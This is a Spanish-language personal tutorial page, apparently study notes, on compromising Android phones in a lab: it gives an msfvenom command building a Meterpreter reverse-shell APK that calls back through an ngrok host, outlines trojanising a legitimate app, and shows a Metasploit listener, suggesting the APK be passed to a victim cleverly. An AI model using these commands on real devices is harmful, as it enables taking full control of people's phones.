Borb3d Page

Página para compartir conocimientos

View on GitHub

Hacking Android

Volver al Indice

Antes de nada quiero comentar que esta guía, apuntes, tutorial, como se quiera llamar lo he hecho para mí, para practicar y recordar lo que estoy haciendo.
Partiendo de que lo he elaborado basándome en cursos que he ido ojeando, de plataformas como Udemy, BacktracAcademy, youtube, es posible que veáis bastantes referencias de algunos curso que os podáis encontrar, por lo tanto no es algo que haya realizado yo desde 0, es basado en mi experiencia propia y con ayuda de estos cursos.
¡COMENZAMOS!


INDICE


Preparación del laboratorio

Primero debemos descargarnos la aplicación “VMOS” en nuestro terminal.

https://www.vmos.com/

installROM vmosInstall

vmosUnlocker vmosUnlocker

modoDeveloper

rootReboot

rootChecker

Como saben, no soy partidario de usar Metasploit (ni me gusta) pero en el caso de los dispositivos Android, cuando me puse a investigar todo el mundo lo usaba, así que lo probé… Y ¡Claro!, es normal que se use Metasploit en esta plataforma. Te ofrece muchísimas opciones para realizar de una forma muy pero que muy sencilla.

Nota: Ofrece opciones que nos permiten realizar una gran variedad de acciones sobre el dispositivo vulnerado.

Crear APK maliciosa sencilla

Con "NGROK" podemos levantar un servidor para que la víctima descarge nuestra APK maliciosa. Tenemos primero que registrarnos en la página web para que se sincronice la cuenta con la de la app y usar el apiToken.
Páginas de descarga de NGROK:
https://ngrok.com/
https://github.com/inconshreveable/ngrok

ngrok

Explico un poco lo que aparece en esta imagen:

ngrokWeb

Con “msfvenom” podemos crear una APK maliciosa, para ello ejecutamos el siguiente comando.
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=17547 -o reverse.apk

msfvenom

Una vez hecho todo esto solo deberíamos dejar en escucha un multi-handler de metasploit escuchando en todas las IPs (0.0.0.0) y el puerto que le dijimos nosotros a ngrok (el local).

Todo esto lo vamos a ver más en detalle en el apartado Ejecución de exploit en la víctima

Crear APK maliciosa “original”

Lo primero explicar esto, cuando digo APK maliciosa “original”, lo que vamos a hacer es:

Empezamos

apktoolDirty

apktoolUse

tarSmali

grepManifest

onCreate

PermisosAPKmaliciosa

Permisison

compilando

keystore

jarsigner

zipalign

Ejecución de exploit en la víctima

Lo primero que debemos hacer es, en este ejemplo, dejar NGROK preparado para recibir peticiones TCP (se ve en el apartado Crear APK maliciosa sencilla.
Hecho esto debemos crear un payload con “msfvenom” (se ve en el apartado Crear APK maliciosa sencilla) en este caso, va a ser con una APK descargada desde “apkmonk” y modificándola colocándole nuestro payload.
Ahora, debemos pasarle a la víctima nuestra APK maliciosa de la forma más ingeniosa que podamos o se nos ocurra. (Al estar en un entorno controlado en red local, simplemente me lo voy a pasar a mi dispositivo)
Finalmente debemos dejar Metasploit a la escucha con el multi-handler por el puerto que le indicamos a NGROK (el local) para poder recibir la shell de Meterpreter.

multiHandler

Con esto ya realizado Metasploit quedaría a la escucha de todas las peticiones a ese puerto. Lo único que nos queda por hacer es abrir la aplicación en nuestra víctima para recibir una shell de Meterpreter y tener control total del dispositivo.

La aplicación no os dará ningún problema pero os saltará el “Play Protect” esto es normal porque la app no está en la Play Store, cualquier aplicación fuera de la store saltará este aviso.

playProtect appInstalled

¡ENHORABUENA!, hemos conseguido vulnerar un dispositivo Android de una manera muy sencilla.

Para cualquier duda, ayuda, queja, sugerencia o reclamación tenéis mi contacto en la página principal.

Subir

exploited